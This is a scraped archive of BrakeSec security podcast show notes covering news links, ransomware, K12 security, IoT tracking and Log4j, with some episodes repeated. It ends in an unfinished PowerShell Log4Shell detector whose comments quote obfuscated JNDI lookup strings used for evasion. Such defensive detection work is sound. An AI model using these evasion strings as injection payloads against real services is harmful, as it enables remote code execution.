https://www.bnbchain.org/en/blog/bnb-chain-ecosystem-update/
https://www.bbc.com/news/business-58193396
https://www.theverge.com/2022/4/18/23030754/beanstalk-cryptocurrency-hack-182-million-dao-voting
https://jpgormally.medium.com/cybersecurity-is-a-successfully-failure-9bcf92a1bc88
https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1
Published on: October 12, 2022
https://www.theverge.com/2022/9/16/23356213/uber-hack-teen-slack-google-cloud-credentials-powershell
https://www.zdnet.com/article/uber-security-breach-looks-bad-potentially-compromising-all-systems/
https://twitter.com/RachelTobac/status/1571542949606957057
Twitter:
@boettcherpwned
@infosystir
@brakeSec
@bryanbrake
Twitch: https://twitch.tv/brakesec
Published on: September 19, 2022
checkout our website: https://www.brakeingsecurity.com
Follow and subscribe with your Amazon Prime account to our Twitch stream: https://twitch.tv/brakesec
Twitter:
@infosystir
@boettcherpwned
@bryanbrake
@brakesec
Find us on all your favorite podcast platforms! Please leave us a 5 star review to help us grow!
Published on: September 2, 2022
Part 2 of our discussion this week with Amanda, Brian, and Bryan on sysmon. We discuss use cases from her talk, and the best ways to get sysmon integrated into your environment.
BrakeSec is:
Amanda Berlin @infosystir
Brian Boettcher @boettcherpwned
Bryan Brake @bryanbrake
https://www.brakeingsecurity.com
Our #twitch stream can be found at:
https://twitch.tv/brakesec (subscription is req'd to see full videos)
This week Amanda, Brian, and Bryan discuss sysmon, how it works to detect IOCs in your org, and how it extends beyond regular Windows event monitoring.
oh... and it's available for Linux too!
Tanya Janca, also known as @SheHacksPurple, is the best-selling author of ‘Alice and Bob Learn Application Security’. She is also the founder of We Hack Purple, an online learning academy, community and podcast that revolves around teaching everyone to create secure software. Tanya has been coding and working in IT for over twenty years, won countless awards, and has been everywhere from startups to public service to tech giants (Microsoft, Adobe, & Nokia). She has worn many hats; startup founder, pentester, CISO, AppSec Engineer, and software developer. She is an award-winning public speaker, active blogger & streamer and has delivered hundreds of talks and trainings on 6 continents. She values diversity, inclusion, and kindness, which shines through in her countless initiatives.
BrakeSec is:
Amanda Berlin @infosystir
Brian Boettcher @boettcherpwned
Bryan Brake @bryanbrake
Published on: July 30, 2022
Published on: July 24, 2022
Full #twitch VOD here (prime sub or paid sub required): https://www.twitch.tv/videos/1528342722
https://github.com/untitaker/python-atomicwrites
https://thehackernews.com/2022/07/pypi-repository-makes-2af-security.html
Twitch streams (175+ hours of content!):
https://twitch.tv/brakesec
Twitter:
@infosystir
@boettcherpwned
@brakesec
@bryanbrake
Published on: July 14, 2022
JW Goerlich -
“Wolfgang is a cyber security strategist and an active part of the Michigan security community. He co-founded the OWASP Detroit chapter and organizes the annual Converge and BSides Detroit conferences. Wolfgang has held roles such as the Vice President of Consulting, Security Officer, and Vice President of Technology Services. He regularly advises clients on topics ranging from risk management, incident response, business continuity, secure development life cycles, and more.”
RSA talks and discussion
Phishing tests -
https://www.securityweek.com/research-simulated-phishing-tests-make-organizations-less-secure
https://hbr.org/2021/04/phishing-tests-are-necessary-but-they-dont-need-to-be-evil
What is the goal of these tests?
That someone will click and activate (is that not a given?)
What made them popular in the first place?
Is this an example of management not taking security seriously, so we needed proof?
FTA: “This will only undermine the efforts of cybersecurity teams as a whole, alienating the very people they aim to engage with, Barker adds. “People generally don’t like to be tricked, and they don’t usually trust the people who trick them. One counterargument I often hear is that criminals use emotive lures in a phish, so why shouldn’t we? Well, criminals also cause physical damage to property, take systems offline, and disrupt services, but physical social engineers and pen-testers don’t—for good reason. Simulations should not cause active harm.””
Is this part of a larger issue? Why do we treat these tests the way we do?
Typical scenario?
Mgmt does not believe or trust their internal people to tell them what is wrong, and takes a 3rd party source/product to tell them the same thing.
Are these stories apocryphal? Or just my experience?
Published on: July 5, 2022
Author of the #noStarch book "The Art of Cyberwarfare" (https://nostarch.com/art-cyberwarfare)
Topics:
discusses his book,
threat intel as a service,
why people enjoy malware analysis?
Should people 'hack back' and what legal issues are around that?
How do you soften the messaging if you have an insider threat team?
www.infoseccampout.com for more information about our 2022 conference in Seattle, WA on 26-28 August 2022!
Our full 90 minute stream with Jon, including 30 minutes of audio you won't get on the audio podcast is available at the $5 USD Patreon level, or via our VOD at our Twitch Broadcast site (https://twitch.tv/brakesec)
Twitch VOD Link: https://www.twitch.tv/videos/1308277609
Thank you to our Patreon and Twitch supporters for their generous donations and subs and bits!
Published on: June 16, 2022
Published on: June 9, 2022
https://www.securityweek.com/conti-ransomware-operation-shut-down-after-brand-becomes-toxic
https://portswigger.net/daily-swig/chicago-public-schools-data-breach-blamed-on-ransomware-attack-on-supplier
https://www.helpnetsecurity.com/2022/05/23/protect-kubernetes-cluster/
https://www.darkreading.com/application-security/6-scary-tactics-used-in-mobile-app-attacks
Published on: May 24, 2022
Mieng Lim, VP of Product at Digital Defense by HelpSystems
Topic she will discuss:
https://www.digitaldefense.com/blog/infographic-the-latest-ransomware-facts/
https://www.digitaldefense.com/blog/the-terrifying-truth-about-ransomware/
Prepared questions from Mieng:
https://www.techrepublic.com/article/initial-access-brokers-how-are-iabs-related-to-the-rise-in-ransomware-attacks/
https://www.pandasecurity.com/en/mediacenter/security/ransomware-statistics/
As new approaches to ransomware like double extortion continue to pay off, attackers are demanding higher ransom payouts than ever before. The average ransom demand in the first half of 2021 amounted to $5.3 million — a 518% increase compared to 2020. The average ransom payment has also increased by 82% since 2020, reaching a whopping $570,000 in the first half of 2021 alone.
The FBI’s Internet Crime Complaint Center (IC3) received 2,084 ransomware complaints in the first half of 2021. (FBI and CISA)
At least one employee downloaded a malicious mobile application in 46% of organizations in 2021. (Check Point)
@infosystir
@boettcherpwned
@bryanbrake (on Mastodon & Twitter)
@brakeSec
Discord Invite! "please click OK to accept the Code of Conduct in the 'Rules-and-info' channel" https://discord.gg/brakesec
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
Apple Podcasts: https://podcasts.apple.com/us/podcast/brakeing-down-security-podcast/id799131292
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
#Patreon: https://brakesec.com/BDSPatreon
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: May 11, 2022
@bettersafetynet
@infosystir
@boettcherpwned
@bryanbrake
@brakeSec
Discord Invite! "please click OK to accept the Code of Conduct in the 'Rules-and-info' channel" https://discord.gg/jhzm4bK9
Published on: May 4, 2022
https://www.cyberscoop.com/dhs-bug-bounty-122-vulnerabilities-27-critical-hackers/
https://securityaffairs.co/wordpress/130564/hacking/atlassian-jira-authentication-bypass-issue.html
https://confluence.atlassian.com/jira/jira-security-advisory-2022-04-20-1115127899.html
https://www.coalfire.com/the-coalfire-blog/research-reveals-cyber-risk-is-the-best-language
https://www.cnet.com/tech/mobile/verizon-wireless-customers-report-outages-across-us/
https://www.infosecurity-magazine.com/news/fbi-warns-us-farmers-of-ransomware/
https://securityaffairs.co/wordpress/130497/security/cyber-insurance-global-riskenvironment.html
https://securityaffairs.co/wordpress/130443/hacking/cisco-umbrella-default-ssh-key.html
https://www.helpnetsecurity.com/2022/04/19/open-source-usage-trends/
https://gizmodo.com/cia-nsa-spies-tracked-anomaly-6-product-demo-1848830150
https://www.infosecurity-magazine.com/news/hackers-gain-admin-rights-with/
https://scottbarrykaufman.com/podcast/
Discord invite (must read and heed the Code of Conduct before admittance to the Discord):
https://discord.gg/38eEBYNJ7B (good for 100 invites)
Twitch stream: https://twitch.tv/brakesec
Published on: April 26, 2022
https://www.brakeingsecurity.com
@bettersafetynet
@infosystir
@boettcherpwned
@bryanbrake
@brakeSec
Published on: April 21, 2022
@infosystir on Twitter
@bryanbrake
@boettcherpwned
Published on: April 5, 2022
Shannon Noonan and Stacey Cameron - QoS Consulting
https://www.forrester.com/blogs/the-new-change-management-automated-and-decentralized/
https://www.tibco.com/reference-center/what-is-process-automation
https://www.malwarearchaeology.com/cheat-sheets
Published on: March 22, 2022
https://www.twitch.tv/brakesec
Youtube video (full version): https://www.youtube.com/watch?v=eRwYB22XMNw
Published on: March 12, 2022
For context, we at the K12 Security Information Exchange (K12 SIX) are a relatively new K12-specific ISAC – launched to help protect the US K12 sector from emerging cybersecurity risk. One of our signature accomplishments in our first year was the development and release of our ‘essential protections’ series – an effort to establish baseline cybersecurity standards for schools. See: https://www.k12six.org/essential-cybersecurity-protections
https://www.grf.org/
Global Resilience Federation
We will help your industry develop or enhance a trusted threat information sharing community, obtain actionable intelligence, and support you in emergencies.
We all count on the resiliency of essential services - services from the electricity powering our homes and the connectivity of entertainment apps, to the legal systems and financial pipelines driving the global economy. But this infrastructure faces constant threats from hacktivists, criminals, and rogue states, and they are growing in sophistication.
Leveraging nearly 20 years of ISAC and ISAO expertise, GRF is a non-profit created to connect sharing communities, for mutual defense.
https://theconversation.com/cybercriminals-use-pandemic-to-attack-schools-and-colleges-167619
https://edscoop.com/texas-school-paid-547k-ransomware-jam/
https://statescoop.com/ransomware-allen-texas-school-district-email-parents/
https://www.toptal.com/insights/innovation/cybersecurity-in-higher-education
https://www.cnn.com/2022/01/07/politics/ransomware-schools-website/index.html
2020 report: https://k12cybersecure.com/wp-content/uploads/2021/03/StateofK12Cybersecurity-2020.pdf
85-89% of school systems have 2,500 students or fewer
Omg: https://www.edweek.org/leadership/education-statistics-facts-about-american-schools/2019/01
https://www.youtube.com/watch?v=otv0KzkfLSc –Florida mom, daughter accused of rigging homecoming queen votes break silence l GMA
There are 130,930 public and private K-12 schools in the U.S., according to 2017-18 data from the National Center for Education Statistics (NCES). Here’s how they break down:
What are some of the ways you go about addressing the challenge of even reaching smaller schools? Does the ISAC help?
How do you communicate major security events like log4j? Do you keep track of complications with certain software stacks?
Someone listening might say “hey, I’d love to help…” what/if any opportunities can the larger infosec community do to help your org?
Published on: March 1, 2022
The K12 Security Information Exchange (K12 SIX) is a relatively new K12-specific ISAC – launched to help protect the US K12 sector from emerging cybersecurity risk. One of our signature accomplishments in our first year was the development and release of our ‘essential protections’ series – an effort to establish baseline cybersecurity standards for schools. See: https://www.k12six.org/essential-cybersecurity-protections
Global Resilience Federation
We will help your industry develop or enhance a trusted threat information sharing community, obtain actionable intelligence, and support you in emergencies.
We all count on the resiliency of essential services - services from the electricity powering our homes and the connectivity of entertainment apps, to the legal systems and financial pipelines driving the global economy. But this infrastructure faces constant threats from hacktivists, criminals, and rogue states, and they are growing in sophistication.
Leveraging nearly 20 years of ISAC and ISAO expertise, GRF is a non-profit created to connect sharing communities, for mutual defense.
https://theconversation.com/cybercriminals-use-pandemic-to-attack-schools-and-colleges-167619
https://edscoop.com/texas-school-paid-547k-ransomware-jam/
https://statescoop.com/ransomware-allen-texas-school-district-email-parents/
https://www.toptal.com/insights/innovation/cybersecurity-in-higher-education
https://www.cnn.com/2022/01/07/politics/ransomware-schools-website/index.html
2020 report: https://k12cybersecure.com/wp-content/uploads/2021/03/StateofK12Cybersecurity-2020.pdf
85-89% of school systems have 2,500 students or fewer
Omg: https://www.edweek.org/leadership/education-statistics-facts-about-american-schools/2019/01
https://www.youtube.com/watch?v=otv0KzkfLSc –Florida mom, daughter accused of rigging homecoming queen votes break silence
There are 130,930 public and private K-12 schools in the U.S., according to 2017-18 data from the National Center for Education Statistics (NCES). Here’s how they break down:
What are some of the ways you go about addressing the challenge of even reaching smaller schools? Does the ISAC help?
How do you communicate major security events like log4j? Do you keep track of complications with certain software stacks?
Someone listening might say “hey, I’d love to help…” what/if any opportunities can the larger infosec community do to help your org?
Alyssa Miller (@AlyssaM_InfoSec)
April Wright (@Aprilwright)
Log4j and OSS software management and profitability
Free as in beer, but you pay for the cup… (license costs $$, not the software).
“If you make money using our software, you must buy a license” - not an end-user license
Open source conference at Whitehouse:
“For too long, the software community has taken comfort in the assumption that open source software is generally secure due to its transparency and the assumption that many eyes were watching to detect and resolve problems,” said Kent Walker, chief legal officer at Google in a blog post published after the meeting. “But in fact, while some projects do have many eyes on them, others have few or none at all.”
Show was inspired by this Twitter conversation:
https://twitter.com/aprilwright/status/1461724712455782400?t=Fv2tmSTXrn-SSjPCka3gxg&s=19
https://twitter.com/AlyssaM_InfoSec/status/1464661807751213056?t=CFy-hgcHo2a8NwowKYo0hg&s=19
Open source IoT platforms: https://www.record-evolution.de/en/open-source-iot-platforms-making-innovation-count/
Cloud services - processing messages, register/de-register devices, pass messages to other devices/gateways
Gateways -
Devices -
Mobile apps -
SDKs -
integrations
Cloud services DO go offline, point of failure:
https://www.datacenterdynamics.com/en/news/aws-us-east-1-outage-brings-down-services-around-the-world/
Connectivity and sharing mesh networks assumes you like your neighbors.
Sidewalk Whitepaper: https://m.media-amazon.com/images/G/01/sidewalk/final_privacy_security_whitepaper.pdf
network vulnerabilities: https://fractionalciso.com/why-you-should-not-be-using-xfinitywifi-hotspots/
Fine GPS locations
Nearby devices triangulate (via BLE, wifi, or 900 MHz)
We want to find our lost devices, but devices can be used for stalking
Just have an iPhone and you’ll be able to find a stalking device, just install a 100MB app (Ring, Alexa, etc) to detect all devices in the area, or use the right ecosystem to find these items (or know every possible device that could be used to track someone)
What do companies want with that information?
What is a ‘happy medium’ to allow you to find your dog, but not to track people?
Device controls? Buzzers? (how loud can you make a noise in a small device?) Size issues, battery life, beaconing, self-identification (“Hi, I am a lost device…”)
Is what Airtags doing enough to reduce the fear?
Are we designing to edge cases? There are cheaper/easier ways to track someone (phones have a longer standby time than fetch/airtag/tile)
How often do you lose your keys? Why is your dog not on a leash or properly trained?
What will it take to make these kinds of devices more secure?
https://spectrum.ieee.org/why-iot-sensors-need-standards
Will it take privacy protections to motivate IoT devices to design a better IoT device? Or force standards to be followed, like https://www.ioxtalliance.org/get-ioxt-certified?
Or NIST standards: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-213-draft.pdf
https://csrc.nist.gov/publications/detail/sp/800-213a/final - detailed specs
Does your IoT platform give out SDKs for integrations or allow 3rd-party products or apps? https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/
https://www.avsystem.com/blog/iot-ecosystem/
Old and outdated libraries, like TCP vulnerabilities (RIPPLE20)
https://www.businessinsider.com/iot-security-privacy
https://www.eurofins-cybersecurity.com/news/security-problems-iot-devices/
https://arxiv.org/ftp/arxiv/papers/1302/1302.0939.pdf - Security and Privacy Issues in Wireless Mesh Networks: A Survey
https://krebsonsecurity.com/2021/09/apple-airtag-bug-enables-good-samaritan-attack/
https://www.amazon.com/gp/help/customer/display.html?nodeId=GZ4VSNFMBDHLRJUK
Opt-out of Amazon sidewalk
Amazon Sidewalk discussion: https://www.silabs.com/support/training/amazon-sidewalk-development/amz-103-amazon-sidewalk-technology-architecture-and-infrastructure
Fetch:
As one example, this week we announced Fetch, a compact, lightweight device that will clip to your pet’s collar and help ensure they’re safe. If your dog wanders outside a perimeter you’ve set using the Ring app, Fetch will let you know. In the future, expanding the Amazon Sidewalk network will provide customers with even more capabilities like real-time location information, helping you quickly reunite with your lost pet. For device makers, Fetch also serves as a reference design to demonstrate the potential that devices connected to a broad, reliable network can provide to their customers.
https://www.aboutamazon.com/news/devices/introducing-amazon-sidewalk
Published on: February 15, 2022
Alyssa Miller (@AlyssaM_InfoSec)
April Wright (@Aprilwright)
Talk about side projects, podcasts, speaking events, etc (if you want to)
Log4j and OSS software management and profitability
Free as in beer, but you pay for the cup… (license costs $$, not the software).
“If you make money using our software, you must buy a license” - not an end-user license
Open source conference at Whitehouse:
“For too long, the software community has taken comfort in the assumption that open source software is generally secure due to its transparency and the assumption that many eyes were watching to detect and resolve problems,” said Kent Walker, chief legal officer at Google in a blog post published after the meeting. “But in fact, while some projects do have many eyes on them, others have few or none at all.”
Show was inspired by this Twitter conversation:
https://twitter.com/aprilwright/status/1461724712455782400?t=Fv2tmSTXrn-SSjPCka3gxg&s=19
https://twitter.com/AlyssaM_InfoSec/status/1464661807751213056?t=CFy-hgcHo2a8NwowKYo0hg&s=19
Open source IoT platforms: https://www.record-evolution.de/en/open-source-iot-platforms-making-innovation-count/
Cloud services - processing messages, register/de-register devices, pass messages to other devices/gateways
Gateways -
Devices -
Mobile apps -
SDKs -
integrations
Cloud services DO go offline, point of failure:
https://www.datacenterdynamics.com/en/news/aws-us-east-1-outage-brings-down-services-around-the-world/
Connectivity and sharing mesh networks assumes you like your neighbors.
Sidewalk Whitepaper: https://m.media-amazon.com/images/G/01/sidewalk/final_privacy_security_whitepaper.pdf
network vulnerabilities: https://fractionalciso.com/why-you-should-not-be-using-xfinitywifi-hotspots/
Fine GPS locations
Nearby devices triangulate (via BLE, wifi, or 900 MHz)
We want to find our lost devices, but devices can be used for stalking
Just have an iPhone and you’ll be able to find a stalking device, just install a 100MB app (Ring, Alexa, etc) to detect all devices in the area, or use the right ecosystem to find these items (or know every possible device that could be used to track someone)
What do companies want with that information?
What is a ‘happy medium’ to allow you to find your dog, but not to track people?
Device controls? Buzzers? (how loud can you make a noise in a small device?) Size issues, battery life, beaconing, self-identification (“Hi, I am a lost device…”)
Is what Airtags doing enough to reduce the fear?
Are we designing to edge cases? There are cheaper/easier ways to track someone (phones have a longer standby time than fetch/airtag/tile)
How often do you lose your keys? Why is your dog not on a leash or properly trained?
What will it take to make these kinds of devices more secure?
https://spectrum.ieee.org/why-iot-sensors-need-standards
Will it take privacy protections to motivate IoT devices to design a better IoT device? Or force standards to be followed, like https://www.ioxtalliance.org/get-ioxt-certified?
Or NIST standards: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-213-draft.pdf
https://csrc.nist.gov/publications/detail/sp/800-213a/final - detailed specs
Does your IoT platform give out SDKs for integrations or allow 3rd-party products or apps? https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/
https://www.avsystem.com/blog/iot-ecosystem/
Old and outdated libraries, like the Treck TCP/IP stack vulnerabilities (Ripple20)
https://www.businessinsider.com/iot-security-privacy
https://www.eurofins-cybersecurity.com/news/security-problems-iot-devices/
https://arxiv.org/ftp/arxiv/papers/1302/1302.0939.pdf - Security and Privacy Issues in Wireless Mesh Networks: A Survey
https://krebsonsecurity.com/2021/09/apple-airtag-bug-enables-good-samaritan-attack/
https://www.amazon.com/gp/help/customer/display.html?nodeId=GZ4VSNFMBDHLRJUK
Opt-out of Amazon sidewalk
Amazon Sidewalk discussion: https://www.silabs.com/support/training/amazon-sidewalk-development/amz-103-amazon-sidewalk-technology-architecture-and-infrastructure
Fetch:
As one example, this week we announced Fetch, a compact, lightweight device that will clip to your pet’s collar and help ensure they’re safe. If your dog wanders outside a perimeter you’ve set using the Ring app, Fetch will let you know. In the future, expanding the Amazon Sidewalk network will provide customers with even more capabilities like real-time location information, helping you quickly reunite with your lost pet. For device makers, Fetch also serves as a reference design to demonstrate the potential that devices connected to a broad, reliable network can provide to their customers.
https://www.aboutamazon.com/news/devices/introducing-amazon-sidewalk
Published on: February 7, 2022
News articles we covered this week:
https://www.wired.com/story/belarus-railways-ransomware-hack-cyber-partisans/
https://www.hackingarticles.in/linux-privilege-escalation-polkit-cve-2021-3560/
https://old.reddit.com/r/msp/comments/s48iji/vmware_horizon_servers_being_actively_hit_with/
Whimmery's Walkthroughs: Join @whimmery on her twitch or on the @brakesec Youtube channel for walkthroughs on Burp Suite training and more!
Twitter handles:
Official Podcast: @brakesec
Brian Boettcher: @boettcherpwned
Amanda Berlin: @infosystir @hackersHealth @infosecroleplay
Bryan Brake: @bryanbrake
Published on: February 1, 2022
Alyssa Miller (@AlyssaM_InfoSec)
April Wright (@Aprilwright)
0. Open Source issues (quick discussion, because I value your opinions, and supply chain is important in the IoT world too.)
Log4j and OSS software management and profitability
Free as in beer, but you pay for the cup… (license costs $$, not the software).
“If you make money using our software, you must buy a license” - not an end-user license
Open source conference at Whitehouse:
https://www.zdnet.com/article/log4j-after-white-house-meeting-google-calls-for-list-of-critical-open-source-projects/
https://www.wsj.com/articles/white-house-convenes-open-source-security-summit-amid-log4j-risks-11642119406
“For too long, the software community has taken comfort in the assumption that open source software is generally secure due to its transparency and the assumption that many eyes were watching to detect and resolve problems,” said Kent Walker, chief legal officer at Google in a blog post published after the meeting. “But in fact, while some projects do have many eyes on them, others have few or none at all.”
Show was inspired by this Twitter conversation:
https://twitter.com/aprilwright/status/1461724712455782400?t=Fv2tmSTXrn-SSjPCka3gxg&s=19
https://twitter.com/AlyssaM_InfoSec/status/1464661807751213056?t=CFy-hgcHo2a8NwowKYo0hg&s=19
IOT architecture (https://www.avsystem.com/blog/iot-ecosystem/)
Open source IoT platforms: https://www.record-evolution.de/en/open-source-iot-platforms-making-innovation-count/
Cloud services - processing messages, register/de-register devices, pass messages to other devices/gateways
Gateways -
Devices -
Mobile apps -
SDKs -
integrations
Cloud services DO go offline, point of failure:
https://www.datacenterdynamics.com/en/news/aws-us-east-1-outage-brings-down-services-around-the-world/
Connectivity and sharing mesh networks assumes you like your neighbors.
Sidewalk Whitepaper: https://m.media-amazon.com/images/G/01/sidewalk/final_privacy_security_whitepaper.pdf
network vulnerabilities: https://fractionalciso.com/why-you-should-not-be-using-xfinitywifi-hotspots/
Stalking/privacy vs. tracking/surveillance
Fine GPS locations
Nearby devices triangulate (via BLE, wifi, or 900mhz)
We want to find our lost devices, but devices can be used for stalking
https://www.autoevolution.com/news/police-claim-apple-has-unwillingly-created-the-most-convenient-stalking-device-179228.html
Just have an iPhone and you’ll be able to find a stalking device, just install a 100MB app (Ring, Alexa, etc) to detect all devices in the area, or use the right ecosystem to find these items (or know every possible device that could be used to track someone)
What do companies want with that information?
What is a ‘happy medium’ to allow you to find your dog, but not to track people?
Device controls? Buzzers? (how loud can you make a noise in a small device?) Size issues, battery life, beaconing, self-identification (“Hi, I am a lost device…”)
Is what Airtags doing enough to reduce the fear?
Are we designing to edge cases? There are cheaper/easier ways to track someone (phones have a longer standby time than fetch/airtag/tile)
How often do you lose your keys? Why is your dog not on a leash or properly trained?
What will it take to make these kinds of devices more secure?
https://spectrum.ieee.org/why-iot-sensors-need-standards
Will it take privacy protections to motivate vendors to design better IoT devices? Or forcing standards to be followed, like https://www.ioxtalliance.org/get-ioxt-certified?
Or NIST standards: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-213-draft.pdf
https://csrc.nist.gov/publications/detail/sp/800-213a/final - detailed specs
Threat modeling, vulnerabilities in IoT networks and platforms
Does your IoT platform give out SDKs for integrations or allow 3rd-party products or apps? https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/
https://www.avsystem.com/blog/iot-ecosystem/
Old and outdated libraries, like the Treck TCP/IP stack vulnerabilities (Ripple20)
https://www.businessinsider.com/iot-security-privacy
https://www.eurofins-cybersecurity.com/news/security-problems-iot-devices/
https://arxiv.org/ftp/arxiv/papers/1302/1302.0939.pdf - Security and Privacy Issues in Wireless Mesh Networks: A Survey
https://krebsonsecurity.com/2021/09/apple-airtag-bug-enables-good-samaritan-attack/
https://www.amazon.com/gp/help/customer/display.html?nodeId=GZ4VSNFMBDHLRJUK
Opt-out of Amazon sidewalk
Amazon Sidewalk discussion: https://www.silabs.com/support/training/amazon-sidewalk-development/amz-103-amazon-sidewalk-technology-architecture-and-infrastructure
Fetch:
As one example, this week we announced Fetch, a compact, lightweight device that will clip to your pet’s collar and help ensure they’re safe. If your dog wanders outside a perimeter you’ve set using the Ring app, Fetch will let you know. In the future, expanding the Amazon Sidewalk network will provide customers with even more capabilities like real-time location information, helping you quickly reunite with your lost pet. For device makers, Fetch also serves as a reference design to demonstrate the potential that devices connected to a broad, reliable network can provide to their customers.
https://www.aboutamazon.com/news/devices/introducing-amazon-sidewalk
Published on: January 24, 2022
Adam Baldwin (@adam_baldwin)
Amélie Koran (@webjedi)
https://logging.apache.org/log4j/2.x/license.html
https://www.theregister.com/2021/12/14/log4j_vulnerability_open_source_funding/
https://www.zdnet.com/article/security-firm-blumira-discovers-major-new-log4j-attack-vector/
F/OSS developer deliberately bricks his software in retaliation for big companies not supporting OSS.
https://twitter.com/BleepinComputer/status/1480182019854327808
Faker.js - https://www.npmjs.com/package/faker Generate massive amounts of fake contextual data
Colors.js - https://www.npmjs.com/package/colors - get color and style in your node.js console
https://abc7ny.com/suspicious-package-queens-astoria-fire/6425363/
Should OSS teams expect payment for giving their time/code away for free? What are their expectations
Should open source projects be aware of how popular they are? What happens when they reach a certain level of popularity?
OSS Sustainability - https://github.blog/2019-01-17-lets-talk-about-open-source-sustainability/
https://webjedi.net/2022/01/03/security-puppy/
Apparently, “Hobbyists” were the bane of a young Bill Gates: (can you https://en.wikipedia.org/wiki/Open_Letter_to_Hobbyists
https://en.wikipedia.org/wiki/History_of_free_and_open-source_software
History of open source
Licensing Overview: https://youtu.be/Eu_GvrSlShI (this was a talk I gave for Splunk on this --AK)
https://libraries.io/
Libraries.io monitors 5,039,738 open source packages across 32 different package managers, so you don't have to.
Published on: January 18, 2022
Adam Baldwin (@adam_baldwin)
Amélie Koran (@webjedi)
Log4j vulnerability
https://logging.apache.org/log4j/2.x/license.html
https://www.theregister.com/2021/12/14/log4j_vulnerability_open_source_funding/
https://www.zdnet.com/article/security-firm-blumira-discovers-major-new-log4j-attack-vector/
F/OSS developer deliberately bricks his software in retaliation for big companies not supporting OSS.
https://twitter.com/BleepinComputer/status/1480182019854327808
Faker.js - https://www.npmjs.com/package/faker Generate massive amounts of fake contextual data
Colors.js - https://www.npmjs.com/package/colors - get color and style in your node.js console
https://abc7ny.com/suspicious-package-queens-astoria-fire/6425363/
Should OSS teams expect payment for giving their time/code away for free? What are their expectations
Should open source projects be aware of how popular they are? What happens when they reach a certain level of popularity?
OSS Sustainability - https://github.blog/2019-01-17-lets-talk-about-open-source-sustainability/
https://webjedi.net/2022/01/03/security-puppy/
Apparently, “Hobbyists” were the bane of a young Bill Gates: (can you https://en.wikipedia.org/wiki/Open_Letter_to_Hobbyists
https://en.wikipedia.org/wiki/History_of_free_and_open-source_software
History of open source
Licensing Overview: https://youtu.be/Eu_GvrSlShI (this was a talk I gave for Splunk on this)
Published on: January 12, 2022
Introduction
Overview of Log4j vuln (as of 16 December 2021)
Why is it a big deal? (impact/criticality/risk)
Talk about patching vs. mitigation
Why wasn’t this given the same visibility in 2009? Because it’s Oracle or Java?
Good callout is building slides to brief org leadership, detections, and other educational tools.
Vuln fatigue (Java vulns in 2009 and pretty much forever cause us fatigue)
Are there other technologies like log4j that prop up the entire world, and we just don’t know?
Egress traffic (discussed at length on Twitter; what problems does restricting it solve?)
https://twitter.com/mubix/status/1470430085169745920
Latest: https://www.theregister.com/2021/12/14/apache_log4j_v2_16_jndi_disabled_default/ - Apache disabled JNDI lookups by default in Log4j 2.16.0
https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/ <- great aggregation
https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
https://issues.apache.org/jira/plugins/servlet/mobile#issue/LOG4J2-313
Lots of discussion about “SBOM solving the issue”. @K8em0 weighs in https://twitter.com/k8em0/status/1469437490691932164
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592 - list of advisories for log4j
Mitigation: https://twitter.com/brunoborges/status/1469186875608875011
https://twitter.com/DannyThomas/status/1469709039911129088 (holy hell, 2009?!?)
2009 in fact, #CVE-2009-1094, then a bypass was fixed in CVE-2018-3149: https://bugzilla.redhat.com/show_bug.cgi?id=1639834. That's when the JDK was fully protected, but other implementations remained vulnerable
https://bugzilla.redhat.com/show_bug.cgi?id=1639834
OpenJDK…
https://twitter.com/ThinkstCanary/status/1469439743905697797?s=20
You can use a point & click canarytoken from https://canarytokens.org to help test for the #log4j / #Log4Shell issue.
1) visit https://canarytokens.org;
2) choose the Log4shell token;
3) enter the email address you wish to be notified at;
4) copy/use the returned string...
Discussed in 2016 at Blackhat: https://twitter.com/th3_protoCOL/status/1469644923028656130
The #Log4Shell attack vector was known since 2016…
https://twitter.com/bettersafetynet/status/1469470284977745932
Just got off phone with a client. Log4j is in their network. Vendor claims patch will be available next release... which is multiple months from now. Here's what you do if you're in this situation. 1. Keep calm. There's no need to panic. 2. Carefully read this thread.
When dealing with attacks like this you should remember the acronym IMMA.
I = Isolate
M = Minimize
M = Monitor
A = Active Defense
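The callout above about building detections, and the 2.16 change that turned JNDI lookups off by default, both come down to recognising the lookup string itself. The PowerShell below is an added example, not from the episode or from any tool linked in these notes. It flags Log4Shell-style JNDI lookups in text log lines, but first unwraps the nested-lookup evasions that Log4j 2.x resolves recursively (${${lower:j}ndi:...}, ${jndi:${::-l}dap://...}, URL-encoded braces), which is exactly what a plain search for "jndi:" misses. The sample log lines are constructed, the IP addresses are from the documentation range, and the function names are my own.

```powershell
# Added example: Log4Shell (CVE-2021-44228) lookup detection over log lines.
# Log4j resolves ${...} lookups from the inside out, so attackers spell "jndi" and
# "ldap" with ${lower:x}, ${upper:x} and the ${name:-default} syntax to evade string
# matching. Convert-Log4jLookup collapses those wrappers before we test the line.
function Convert-Log4jLookup {
    param([Parameter(Mandatory)][string]$Text)
    $s = $Text
    for ($round = 0; $round -lt 10; $round++) {
        $before = $s
        # URL-encoded $ { } : / as they appear in web access logs ($$ is a literal $ in .NET replacements)
        $s = $s -replace '%24', '$$' -replace '%7B', '{' -replace '%7D', '}' -replace '%3A', ':' -replace '%2F', '/'
        # ${lower:X} and ${upper:X} collapse to X
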